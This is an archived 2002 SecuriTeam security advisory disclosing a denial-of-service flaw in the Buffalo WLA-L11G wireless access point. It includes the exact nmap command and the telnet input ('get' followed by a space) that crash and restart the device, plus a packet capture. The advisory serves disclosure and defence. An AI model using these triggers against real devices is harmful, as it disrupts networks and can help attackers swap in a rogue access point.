[NEWS] Buffalo AP Denial of Service

From: support@securiteam.com
Date: 11/17/02

  • Next message: support@securiteam.com: "[NT] IISPop Remote DoS" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 17 Nov 2002 20:57:34 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Buffalo AP Denial of Service
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in Buffalo's AP allows remote attackers to cause it to no
    longer respond to legitimate request by simply port scanning it.

    DETAILS

    Vulnerable systems:
     * WLA-L11G version 2.31 (WLI-PCM-L11G Ver.6.14)

    While performing a network testing, we have found a Buffalo Access Point
    (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply
    using network scanning tool such as NMap with version grabbing
    (www.insecure.org) in the following manner restarts the AP:

    $ nmap -sVVV -p 80 192.168.177.250

    Where 192.168.177.250 is an IP address of Buffalo AP. Analyzing network
    traffic shows the following:

    14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok]
    4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 51 43788
    0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
    0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07 E..<..@.@.[...M.
    0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000 ..M....P.|.@....
    0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a ....b...........
    0x0030 004e 7cec 0000 0000 0103 0300 .N|.........

    14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok]
    51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 3 0, id 2,
    len 44)
    0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa E..,.......x..M.
    0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41 ..M..P....R..|.A
    0x0020 6012 3e80 b1e2 0000 0204 05b4 0000 `.>...........

    14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok]
    1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 4 0)
    0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07 E..(..@.@.[...M.
    0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1 ..M....P.|.A..R.
    0x0020 5010 16d0 f14f 0000
    P....O..

    14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
    1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 4 6)
    0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07 E.....@.@.[...M.
    0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1 ..M....P.|.A..R.
    0x0020 5018 16d0 08b2 0000 6765 7420 0d0a P.......get...

    14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok]
    1:1(0) ack 7 win
    16000 (ttl 30, id 3, len 40)
    0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa E..(.......{..M.
    0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47 ..M..P....R..|.G
    0x0020 5010 3e80 c999 0000 0000 0000 0000 P.>...........

    14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
    7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 4 2)
    0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07 E..*..@.@.[...M.
    0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R.
    0x0020 5018 16d0 e435 0000 0d0a
    P....5....

    14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
    7:9(2) ack 1 win
    5840 (DF) [tos 0x10] (ttl 64, id 49840, len 4 2)
    0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07 E..*..@.@.[...M.
    0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R.
    0x0020 5018 16d0 e435 0000 0d0a
    P....5....

    14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
    0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8 ..........@..V..
    0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000 M.........M.....
    0x0020 0000 0000 0000 0000 0000 0000 0000 ..............

    14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok]
    7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 4 2)
    0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07 E..*..@.@.[...M.
    0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R.
    0x0020 5018 16d0 e435 0000 0d0a
    P....5....

    14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
    0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8 ..........@..V..
    0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000 M.........M.....
    0x0020 0000 0000 0000 0000 0000 0000 0000 ..............

    14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
    0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8 ..........Zc....
    0x0010 4d07 0007 4006 0656 c0a8 4dfa
    M...@..V..M.

    14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok]
    51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
    0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa E..(.......}..M.
    0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000 ..M..P....R.....
    0x0020 5005 0000 b4e9 0000 0000 0000 0000 P.............

    Attacks can also be reproduced manually via telnet:

    andrei@192.168.177.7:~$ telnet 192.168.177.250 80
    Trying 192.168.177.250...
    Connected to 192.168.177.250 (192.168.177.250).
    Escape character is '^]'.
    GET / HTTP/1.0

    Connection closed by foreign host.

    And

    andrei@192.168.177.7:~$ telnet 192.168.177.250 80
    Trying 192.168.177.250...
    Connected to 192.168.177.250 (192.168.177.250).
    Escape character is '^]'.
    get

    Connection closed by foreign host.

    (Where, there is a <space> after get; without the <space>, the AP doesn't
    restart)

    Impact:
    This vulnerability can be implemented by the attacker to restart the AP.
    This might be useful if the configuration files have been changed by the
    attacker and the AP restart is required to implement the changes. It is
    also possible to implement this attack to spoof an AP and make the clients
    connect to rouge or spoofed AP instead of legitimate one.

    Vendor response:
    According to the Arhont Ltd. policy, all of the found vulnerabilities and
    security issues will be reported to the manufacturer 7 days before
    releasing to public domain (such as CERT and BUGTRAQ).

    If you would like to get more information about this issue, please do not
    hesitate to contact Arhont team.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:andrei@arhont.com> Andrei
    Mikhailovsky.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages